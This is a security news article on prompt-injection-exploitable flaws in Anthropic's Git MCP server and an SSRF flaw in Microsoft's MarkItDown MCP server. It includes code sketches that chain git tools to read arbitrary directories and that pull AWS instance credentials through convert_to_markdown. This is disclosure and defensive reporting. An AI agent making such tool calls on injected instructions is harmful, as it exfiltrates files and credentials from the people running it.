Anthropic, Microsoft MCP Server Flaws Shine a Light on AI Security Risks
Vulnerabilities disclosed this week in MCP servers from Anthropic and Microsoft put a spotlight on security concerns about a protocol that is being widely adopted in the agentic AI era.
Security researchers with AI security startup Cyata this week reported finding three vulnerabilities in the Git MCP server maintained by Anthropic, the AI company that created the Model Context Protocol (MCP) to give AI models and agents a standardized way of accessing external data, tools, and services.

The same day, BlueRock Security, which offers a runtime security platform, reported that its researchers had found a server-side request forgery (SSRF) vulnerability in the MCP server for MarkItDown, Microsoft's popular file-conversion tool, and that further analysis of more than 7,000 MCP servers found that 36.7% could be exposed to the same class of flaw.

These latest reports highlight not only ongoing security concerns about MCP servers, but also the broader risk-and-reward nature of AI technologies, from large language models (LLMs) to agents.

"We're rushing toward a new connectivity standard with the Model Context Protocol … essentially a universal USB port for AI," said Uma Reddy, founder and executive vice president of product and technology for cloud and endpoint security company Uptycs. "It's powerful, but it also introduces serious supply-chain risk. Plugging an LLM directly into the internet or internal systems without guardrails is like leaving your digital front door wide open."

Reddy added that "downloading an MCP server today feels like the early days of the internet. You might be getting a useful tool, or you might be installing a supply-chain implant. Security leaders need to apply the same zero-trust discipline to AI connections that they do to any other privileged access."

MCP's 'Double-Edged Sword'

In a blog post last year, Jesse Griggs, senior threat researcher at cybersecurity firm Red Canary, wrote about what he called the "double-edged sword of MCP," noting that securing MCP servers is comparable to securing any code execution environment. As with Python or PowerShell, which also can perform a broad array of actions on a system – including harmful ones if not properly secured – MCP, by enabling AI agents to execute code and interact with resources, brings similar risks.

"MCP by itself does not include security mechanisms," Griggs wrote. "The absence of built-in security is not a defect, but instead emphasizes the expectation that developers will implement standard security best practices. MCP enables powerful capabilities through tool execution, and with this functionality comes important security and trust considerations that all developers must carefully address."
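Griggs' point that MCP leaves security to the implementer suggests guardrails like the following: a minimal, hypothetical pre-fetch check that validates a user-supplied URI against an allowlist before a tool touches it. Nothing here comes from any real MCP server; the function name and policy values are illustrative assumptions.

```python
from urllib.parse import urlparse

# Hypothetical guardrail a developer might run before an MCP tool fetches a
# user-supplied URI. The allowlist entries below are placeholders.
ALLOWED_SCHEMES = {"https"}
ALLOWED_HOSTS = {"docs.example.com"}  # assumption: your approved content sources
BLOCKED_HOSTS = {"169.254.169.254", "localhost", "127.0.0.1"}  # cloud metadata, loopback

def uri_is_permitted(uri: str) -> bool:
    parsed = urlparse(uri)
    if parsed.scheme not in ALLOWED_SCHEMES:  # rejects file://, http://, etc.
        return False
    host = (parsed.hostname or "").lower()
    return host not in BLOCKED_HOSTS and host in ALLOWED_HOSTS
```

A hostname allowlist alone is not a complete defense (DNS rebinding and redirects can still slip through), but it illustrates the kind of standard practice Griggs says MCP expects developers to bring themselves.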
Three Anthropic Vulnerabilities

According to Yarden Porat, core team engineer for Cyata, the three vulnerabilities in Anthropic's Git MCP server – tracked as CVE-2025-68143, CVE-2025-68145, and CVE-2025-68144 – can be exploited via prompt injection attacks, in which a bad actor inserts malicious instructions into user input or external data to make the AI model bypass its safety rules.

The three flaws could be chained together into a remote code execution exploit. They let an attacker access any git repository on the system, not only the one initially configured for the server, and create a new git repository in any directory on the filesystem.

"Combine these two, and you have a powerful primitive," Porat wrote. "Take any directory … turn it into a git repository with git_init, then use git_log or git_diff to read its contents. The files get loaded into the LLM context, effectively leaking sensitive data to the AI."

From there, a bad actor could abuse the third flaw to delete or overwrite any file on the system. Cyata alerted Anthropic to the vulnerabilities, and the AI company fixed them late last year. Organizations should update the Git MCP server to version 2025.12.18 or later, Porat wrote.
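To make the chain concrete, here is a rough sketch of the tool-call sequence a prompt-injected agent could be steered into making. The tool names git_init, git_log, and git_diff come from Porat's description; the session object, its call_tool() method, the repo_path argument name, and the target directory are all assumptions standing in for whatever MCP client the agent actually uses.

```python
# Sketch of the exploit chain Porat describes, against a generic MCP client
# session. The real exploit may involve extra steps (e.g., staging files);
# this mirrors his two-primitive summary.
TARGET_DIR = "/home/victim/.ssh"  # hypothetical sensitive directory

def read_arbitrary_directory(session, target_dir: str = TARGET_DIR):
    # Primitive 1: the init flaw turns ANY directory into a git repository,
    # far outside the repo the server was configured for.
    session.call_tool("git_init", {"repo_path": target_dir})

    # Primitive 2: the access flaw lets the other git tools operate on that
    # new repo, so git_log or git_diff pull the directory's contents into the
    # LLM context, leaking them to the model and to the prompt's author.
    history = session.call_tool("git_log", {"repo_path": target_dir})
    changes = session.call_tool("git_diff", {"repo_path": target_dir})
    return history, changes
```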
SSRF Risks in MarkItDown MCP

In the case of Microsoft and its MarkItDown MCP server, the security gap lies in file conversion. MarkItDown is a Python tool that converts files such as PDF, HTML, and Word documents into Markdown, a lightweight markup language that AI systems can readily consume, and Microsoft created an MCP server for MarkItDown to let LLMs perform that conversion. Users give MarkItDown a uniform resource identifier (URI), and MarkItDown fetches the resource it points to.

The problem is that there are no real restrictions on the URI, according to David Onwukwe, principal solutions engineer at BlueRock.

"This vulnerability allows an attacker to execute the Markitdown MCP tool convert_to_markdown to call an arbitrary … URI," Onwukwe wrote in a report. "The lack of any boundaries on the URI allows any user, agent or attacker calling the tool to access any http or file resource."

BlueRock ran its research on Amazon Web Services (AWS) EC2 instances running Instance Metadata Service Version 1 (IMDSv1), an older and less secure method for retrieving instance metadata; the same weakness can affect any cloud provider with a comparable service. That's where the threat of SSRF comes in. Users can point the MarkItDown MCP server at a system's instance metadata, and in some circumstances they can also obtain credentials for the instance, giving them access to AWS account data such as secret keys.

"Depending on the level of access the EC2 role has, this could lead to full admin access of the AWS account," he wrote. "If the user has configured this MCP server on HTTP, the metadata can be queried from a remote server."
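Onwukwe's scenario amounts to handing the converter a cloud-metadata URL where a document URI is expected. The sketch below shows roughly what that looks like: convert_to_markdown is the tool name from BlueRock's report and 169.254.169.254 is AWS's standard instance metadata endpoint, while the session object, its call_tool() method, the uri argument name, and the role name are illustrative assumptions.

```python
# Sketch of the SSRF Onwukwe describes: the tool fetches whatever URI it is
# handed, so an attacker aims it at IMDSv1 instead of a document.
IMDS = "http://169.254.169.254/latest/meta-data"

def steal_instance_credentials(session):
    # Step 1: list IAM roles attached to the EC2 instance.
    roles = session.call_tool(
        "convert_to_markdown",
        {"uri": f"{IMDS}/iam/security-credentials/"},
    )
    # Step 2: fetch temporary credentials for a discovered role ("app-role"
    # is a placeholder). IMDSv1 answers plain GETs with no session token,
    # which is what makes this one-shot fetch possible.
    creds = session.call_tool(
        "convert_to_markdown",
        {"uri": f"{IMDS}/iam/security-credentials/app-role"},
    )
    return roles, creds
```

IMDSv2 blunts this particular attack because it requires a session token obtained via a PUT request, something a simple GET-style URI fetch cannot supply.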
The 'Iceberg Problem'

The vulnerability shows how traditional security focuses on prompts – what agents are asked to do, Onwukwe wrote. The real risk, however, lies in what the AI agent does when it runs. By focusing on the request layer, security teams miss what MCP servers actually do, from fetching URLs and reading files to executing code and accessing data.

"This is the iceberg problem," he said. "Gateways see tool requests – the tip. But the real exposure is below the waterline: the runtime layer where agents access internal resources, exfiltrate data, and escalate privileges. That's where this vulnerability lives. And that's where the next hundred vulnerabilities will live, too."